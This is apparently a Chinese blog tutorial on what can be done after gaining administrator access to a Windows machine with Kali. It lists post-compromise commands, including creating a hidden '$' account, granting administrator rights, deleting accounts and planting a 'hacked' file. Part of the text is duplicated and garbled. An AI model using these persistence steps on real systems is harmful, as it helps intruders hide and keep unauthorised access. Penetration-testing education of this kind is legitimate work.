网络安全工程师演示:原来我的计算机可以这样被为所欲为!

最新推荐文章于 2022-10-26 11:19:58 发布
最新推荐文章于 2022-10-26 11:19:58 发布
阅读量196 收藏
点赞数
分类专栏: 黑客 IT技术 科技 文章标签: 网络 信息安全 计算机视觉 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiao1234oaix/article/details/108654908
版权
黑客 同时被 3 个专栏收录
192 篇文章 31 订阅
订阅专栏
科技
187 篇文章 10 订阅
订阅专栏
IT技术
173 篇文章 3 订阅
订阅专栏

一、课前准备
使用kali工具攻击Windows目标计算机并获取目标计算机的管理员权限。
二、课程目标
1.通过学习本课程,了解获取Windows目标计算机管理权限后,可以对其进行若干的操作。
2.通过学习本课程,达到充分利用kali工具所获取信息提高后续渗透测试效率的目标。
三、课程内容
1.远程查看目标计算机的系统信息。
命令:C:\Windows\system32>systeminfo 回车
命令行结果显示界面:(因不支持中文编译,故界面出现乱码,在CMD中输入chcp65001)
一、课前准备
使用kali工具攻击Windows目标计算机并获取目标计算机的管理员权限。
二、课程目标
1.通过学习本课程,了解获取Windows目标计算机管理权限后,可以对其进行若干的操作。
2.通过学习本课程,达到充分利用kali工具所获取信息提高后续渗透测试效率的目标。
三、课程内容
1.远程查看目标计算机的系统信息。
命令:C:\Windows\system32>systeminfo 回车
命令行结果显示界面:(因不支持中文编译,故界面出现乱码,在CMD中输入chcp65001)
在这里插入图片描述
2.在目标计算机中远程创建隐藏账户。
命令:C:\Windows\system32>net user 用户名$ 密码 /add 回车
例子:C:\Windows\system32>net user admin$ 123456 /add
命令行结果显示界面:
在这里插入图片描述
附加知识:①加 , 创 建 账 户 为 隐 藏 账 户 ; 不 加 ,创建账户为隐藏账户;不加 ,创建账户为普通账户。(通过加 符 号 创 建 的 隐 藏 账 户 只 是 无 法 通 过 n e t u s e r 命 令 查 看 , 但 仍 能 通 过 图 形 界 面 查 看 。 如 需 创 建 真 正 隐 藏 账 户 , 需 要 进 行 注 册 表 相 关 操 作 , 后 续 课 程 将 为 大 家 详 细 介 绍 。 ) ② 在 目 标 计 算 机 中 查 看 通 过 加 符号创建的隐藏账户只是无法通过 net user 命令查看,但仍能通过图形界面查看。如需创建真正隐藏账户,需要进行注册表相关操作,后续课程将为大家详细介绍。) ②在目标计算机中查看通过加 netuser符号创建的隐藏账户。
查看步骤:目标计算机->控制面板->用户账户和家庭安全->用户账户->管理账户

3.远程删除目标计算机中已存在的账号。
命令:C:\Windows\system32>net user 用户名 /del 回车
例子:C:\Windows\system32>net user admin /del
命令行结果显示界面:
在这里插入图片描述4.远程将管理员身份赋予目标计算机中的普通用户。
命令:C:\Windows\system32>net localgroup administrators admin /add 回车
命令行结果显示界面:

在这里插入图片描述
5.远程查看目标计算机中的用户是否为管理员身份。
命令:C:\Windows\system32>net localgroup administrators 回车
命令行结果显示界面:
在这里插入图片描述6.远程切换目标计算机的操作路径。
命令:C:\Windows\system32>cd … 回车
命令行结果显示界面:

在这里插入图片描述
7.远程查看目标计算机的目录。
命令:C:\Windows >dir 回车

8.在目标计算机中新建目录。
命令:C:\Windows >md 目录名 回车
例子:C:\Windows >md abc
命令行结果显示界面:
在这里插入图片描述

9.删除目标计算机中已存在的目录。
命令:C:\Windows >rd 目录名 回车
例子:C:\Windows >rd abc
命令行结果显示界面:
在这里插入图片描述

10.在目标计算机中任意目录下创建并编辑文件。
命令:C:\Windows >echo 文件内容 >文件名 回车
例子:在目标计算机的桌面创建并推送文件。
①进入到桌面路径。
命令:C:>cd users
C:\Users>cd Administrator.WIN-IVTN50G0GEH
C:\Users\Administrator.WIN-IVTN50G0GEH>cd desktop
②创建并编辑文件
命令:C:\Users\Administrator.WIN-IVTN50G0GEH\desktop> echo hi you are hacked >hk.txt
命令行结果显示界面:
在这里插入图片描述

       结果查看:
       ![在这里插入图片描述](https://img-blog.csdnimg.cn/20200917224711357.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3hpYW8xMjM0b2FpeA==,size_16,color_FFFFFF,t_70#pic_center)

Ps:windows计算机控制台命令都可以在kali中正常使用。
到此学习完毕,谢谢观看,获取更多干货请持续关注本号!

辛苦原创,各位看官记得好评加关注哦!你也可搜索:Kali与编程,学习更多Kali Linux渗透与白帽编程技巧哦!
点我学习完整视频渗透课,预计更新1000节

Kali与编程~
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
渗透攻防-深入了解Windows
该用户很懒,没有写简介。。。
07-29 1957
前言 本篇是基础教程,带大家了解Windows常用用户及用户组,本地提取用户密码,远程利用Hash登录到本地破解Hash。初步掌握Windows基础安全知识。 目录 第一节 初识Windows 第二节 Windows密码安全 第三节 利用Hash远程登录系统 正文 第一节 初识Windows 1.1、什么是Window Microsoft
网络攻防技术(完整版--网了工程师必看)
04-12
网络攻防技术(完整版--网了工程师必看)
计算机网络安全教程》电子教案和攻防演示动画(清华大学)
11-04
计算机网络安全教程》电子教案和攻防演示动画(清华大学)
网络工程师,网络攻防那些事有了解过吗?
linjingyg的博客
02-03 160
  随着社会信息化的快速发展,网络给人们带来便利的同时,也带来了威胁。尤其是给公众提供服务的单位信息机房基础设施、网络与信息系统受到的威胁更大,为了保障公共服务单位信息机房基础设施、网络与信息系统安全的稳定运行,因此,防范通过互联网对公共服务单位网络与信息系统发起的攻击和破坏,防范内部人员和外来人员的网络安全违法违规行为,显得尤为迫切。   网络工程师在日常运维中面对随时来临的安全威胁,如何有效的避免呢? 这时候运用一些必要的手段来提高防范技能,就显得非常重要了。      一个网络攻击事件,..
黑客Windows攻防初级知识点整合
十一、的博客
04-10 6035
入侵准备 入侵准备之cmd命令 Msconfig ##打开系统配置(运行中输入) Regedit ##打开注册表(运行中输入) Netstat ##监控tcp/IP网络(cmd中运行) -a ##查看本地机器的所有开放的端口 -r ##列出当前的路由信息,本地机器的网关和子网掩码等 -b ##显示创建每个连接或侦听端口时涉及的可执行程序 -e ##显示以太网统计 -f ##显示外部地址的完美限定域名 -n ##以数字形式显示地址和端口号
GoogleSerialPort:Android串口通信:抱歉,学会它真的可以为所欲为 ! ! !
05-18
在C/C++代码中,你可以使用如libserialport这样的库进行串口读写操作。注意,由于串口操作是异步的,可能需要使用线程或回调机制来处理数据收发。 Google的设计思维强调简洁、可扩展和用户体验。在实现串口通信时,...
proxy-www:学会代理就可以为所欲为吗?对,学会代理就可以为所欲为
03-04
对,学会代理就可以为所欲为! const www = new Proxy ( new URL ( 'https://www' ) , { get : function get ( target , prop ) { let o = Reflect . get ( target , prop ) ; if ( typeof o === 'function' ) { ...
网络安全:各年龄群体网络安全行为与意识的调查分析.pdf
最新发布
09-07
首先,民众对安全软件依赖程度较深,有很多人抱着有了防病毒软件就可以“为所欲为”的心态进行网络活动。事实上,防病毒软件仅仅是网络安全终端中的一个组成部分,不可能给予电脑完全的保护。其次,部分民众存在侥幸...
毕业设计选题系统的源码-Data-Hidding-Using-GAN:这是我的毕业论文。你可以为所欲为
06-06
注意:我的英语是bab,所以如果我使用了错误的单词或错误的语法,请忽略。 这是我的毕业论文。 我有两个文档指南。 README.md 中的一个(你正在阅读的这个文件)是英文写的, Vietnam.md是越南文写的。 该项目基于和...
网络安全的治理路径探析.docx
06-09
这两者都是从保护网络安全出发,防止信息被非法分子利用为所欲为。 2.3 身份认证技术的应用 认证技术广泛应用于计算机安全防护,工作人员将独特的身份与客户绑定,使得符合身份认证要求的用户进入,而将不持有有效...
windows系统攻防
09-19
这门课程还是可以,讲解详细,好学易懂,讲解了一些网络技术基础,及攻击方法的详解,以及一些基本攻击工具,零基础就能学会。。
Windows 平台下局域网劫持测试工具 – EvilFoca
10-24
EvilFoca是Windows环境下基于.NET FrameWork的一款轻量级的劫持测试工具。与BackTrack和Kali_Linux下复杂的命令相比,EvilFoca更加小巧,轻便,简单,但其效果更加显著高效。
hackrf-tools for windows
10-01
使用vs2013编译的hackrf-tools工具,可在windows下刷hackrf
局域网渗透的一些小工具(支持win7)
10-31
一些内网的,命令行格式的工具,可以来看看,很简单
关于网络安全Windows命令浅谈
ysds20211402的博客
04-24 256
转自:微点阅读https://www.weidianyuedu.com 网络安全中起重大作用的Windows命令 一些基本的命令往往可以在保护网络安全上起到很大的作用,下面几条命令的作用就非常突出。 检测网络连接 如果你怀疑自己的计算机上被别人安装了木马,或者是中了病毒,但是手里没有完善的工具来检测是不是真有这样的事情发生,那可以使用Windows自带的网络命令来看看谁在连接你的计算机。具体的命令格式是:netstat -an 这个命令能看到所有和本地计算机建立连接的IP,它包含四个部分—.
详解Windows Shim的攻防利用
多媒体编程、网络编程、系统编程、网络安全编程、驱动编程
09-14 2414
*本文原创作者:nickchang,本文属FreeBuf原创奖励计划,未经许可禁止转载 背景 二十多年来,操作系统的发展突飞猛进,windows也走过了各种版本。微软每次都在新版本中加入很多的改进,比如完善某些API,引入新的安全机制(UAC,ASLR,…),调整系统目录结构(Application Data目录 从win98的%windir%\Application Data
渗透测试基础- - -windows网络安全常用dos命令
weixin_67503304的博客
10-26 4469
本文主要从网络安全的角度讲解了windows中的dos命令的基本使用方法。
网络安全常用命令
chen747936427的专栏
02-16 981
1. yum install :指定安装的软件名称 update:进行整体升级,也可添加软件名称,进行单独升级 remove:删除某个软件 search:搜寻某个软件或者重要关键字 list:列出yum所管理的所有的软件名称和版本 info:同上 clean:下载的文件被放到/var/cache/yum,可以使用clean进行移...
Windows系统常见的攻防技术
chuzhisa8737的博客
01-06 577
1、安全的基本分类 物理安全 存放位置 IDC数据中心 设备冗余 提供硬件冗余 硬件设置 设置BIOS密码 ...
那是不是有了钱就可以为所欲为了呢?
02-16
尽管有钱可以为人们提供更多的机会和资源,但它并不能让人们为所欲为。在社会和法律的限制下,每个人都需要遵守一定的规则和道德准则。此外,财富和权力也需要相应的责任和义务,否则可能会带来负面后果。因此,拥有...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Kali与编程~

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值